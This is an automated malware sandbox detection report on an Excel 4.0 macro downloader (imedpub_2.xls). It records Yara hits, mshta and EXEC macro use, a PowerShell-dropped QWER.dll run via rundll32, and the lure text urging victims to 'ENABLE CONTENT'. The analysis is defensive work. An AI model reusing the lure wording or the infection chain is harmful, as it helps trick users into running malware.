Source: Yara match File source: 0000000E.00000002.580991991.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674911093.0000000000710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523666393.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523513402.00000000004F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.645964256.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646120317.0000000000420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675173904.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523491147.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646698678.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646029506.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646064656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523130788.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.649782159.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577866677.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675036629.00000000007C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646641702.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.577472790.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523994055.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675503420.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646764610.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.524063481.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578315852.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.650185514.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578085930.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578205625.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646533313.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.645994754.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646245001.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.649670122.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.646590734.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675011000.0000000000790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523320512.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.578029021.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: imedpub_2.xls Macro extractor: Sheet: Macro1 contains: mshta
Source: imedpub_2.xls Macro extractor: Sheet: Macro1 contains: mshta
Malicious sample detected (through community Yara rule)
Source: imedpub_2.xls, type: SAMPLE Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPED Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 25 .
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 16 , , Previewing is not available for protected documents. 17
Source: Screenshot number: 4 Screenshot OCR: protected documents. 17 18 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 25 . J u 26 27 28 29
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains OLE streams with names of living off the land binaries
Source: imedpub_2.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
Source: imedpub_2.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: imedpub_2.xls Initial sample: EXEC
Source: imedpub_2.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CF8FD 9_2_002CF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CE991 9_2_002CE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CAB87 9_2_002CAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D0001 9_2_002D0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C9011 9_2_002C9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D907F 9_2_002D907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E0056 9_2_002E0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C2051 9_2_002C2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D20BA 9_2_002D20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C70B3 9_2_002C70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CF09B 9_2_002CF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D4116 9_2_002D4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C51BB 9_2_002C51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C81B7 9_2_002C81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C2251 9_2_002C2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DA2E8 9_2_002DA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CE2CC 9_2_002CE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CB2C7 9_2_002CB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C5361 9_2_002C5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C4346 9_2_002C4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E13AD 9_2_002E13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DC3A0 9_2_002DC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DD389 9_2_002DD389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DE395 9_2_002DE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DF435 9_2_002DF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D044F 9_2_002D044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C64E2 9_2_002C64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D8519 9_2_002D8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C5548 9_2_002C5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CA55F 9_2_002CA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D2550 9_2_002D2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D95FA 9_2_002D95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CE5CF 9_2_002CE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DC631 9_2_002DC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D8606 9_2_002D8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DA666 9_2_002DA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D66CA 9_2_002D66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CD6D8 9_2_002CD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D473C 9_2_002D473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C7735 9_2_002C7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C9714 9_2_002C9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D176B 9_2_002D176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CB74D 9_2_002CB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C4816 9_2_002C4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D1889 9_2_002D1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C8969 9_2_002C8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D894B 9_2_002D894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E09B5 9_2_002E09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C59F2 9_2_002C59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DAA30 9_2_002DAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C1A56 9_2_002C1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CEA99 9_2_002CEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DBB23 9_2_002DBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C8B3D 9_2_002C8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D0B19 9_2_002D0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CBB7E 9_2_002CBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DCB5B 9_2_002DCB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D7BA6 9_2_002D7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D4B87 9_2_002D4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C9B83 9_2_002C9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DDBEA 9_2_002DDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D8BE3 9_2_002D8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D9BCF 9_2_002D9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C2BD9 9_2_002C2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C3C3C 9_2_002C3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DAC3A 9_2_002DAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C7C37 9_2_002C7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E0C14 9_2_002E0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D6C49 9_2_002D6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C4C5D 9_2_002C4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DDCF7 9_2_002DDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D5CC4 9_2_002D5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C6D24 9_2_002C6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D6DF8 9_2_002D6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C9DCF 9_2_002C9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D7DD5 9_2_002D7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DBE27 9_2_002DBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C3E3F 9_2_002C3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E0E3A 9_2_002E0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DAE6D 9_2_002DAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C5E60 9_2_002C5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D0E53 9_2_002D0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CEE81 9_2_002CEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D9EEC 9_2_002D9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C4EE3 9_2_002C4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CAEFB 9_2_002CAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002DDEDC 9_2_002DDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E0F33 9_2_002E0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CCF47 9_2_002CCF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C7FF2 9_2_002C7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002CDFF3 9_2_002CDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00203C3C 10_2_00203C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00209011 10_2_00209011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021044F 10_2_0021044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002120BA 10_2_002120BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020F8FD 10_2_0020F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020D6D8 10_2_0020D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00214116 10_2_00214116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002213AD 10_2_002213AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020AB87 10_2_0020AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00207FF2 10_2_00207FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002059F2 10_2_002059F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002195FA 10_2_002195FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021BE27 10_2_0021BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021C631 10_2_0021C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021AA30 10_2_0021AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021F435 10_2_0021F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00207C37 10_2_00207C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220E3A 10_2_00220E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021AC3A 10_2_0021AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00203E3F 10_2_00203E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00210001 10_2_00210001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00218606 10_2_00218606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00204816 10_2_00204816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220C14 10_2_00220C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00205E60 10_2_00205E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021A666 10_2_0021A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021AE6D 10_2_0021AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021907F 10_2_0021907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00216C49 10_2_00216C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00202051 10_2_00202051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00202251 10_2_00202251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00210E53 10_2_00210E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220056 10_2_00220056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00201A56 10_2_00201A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00204C5D 10_2_00204C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002070B3 10_2_002070B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020EE81 10_2_0020EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00211889 10_2_00211889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020EA99 10_2_0020EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020F09B 10_2_0020F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002064E2 10_2_002064E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00204EE3 10_2_00204EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021A2E8 10_2_0021A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00219EEC 10_2_00219EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021DCF7 10_2_0021DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020AEFB 10_2_0020AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00215CC4 10_2_00215CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020B2C7 10_2_0020B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002166CA 10_2_002166CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020E2CC 10_2_0020E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021DEDC 10_2_0021DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021BB23 10_2_0021BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00206D24 10_2_00206D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220F33 10_2_00220F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00207735 10_2_00207735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021473C 10_2_0021473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00208B3D 10_2_00208B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00209714 10_2_00209714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00218519 10_2_00218519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00210B19 10_2_00210B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00205361 10_2_00205361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00208969 10_2_00208969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021176B 10_2_0021176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020BB7E 10_2_0020BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00204346 10_2_00204346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020CF47 10_2_0020CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00205548 10_2_00205548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021894B 10_2_0021894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020B74D 10_2_0020B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00212550 10_2_00212550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021CB5B 10_2_0021CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0020A55F 10_2_0020A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021C3A0 10_2_0021C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00217BA6 10_2_00217BA6
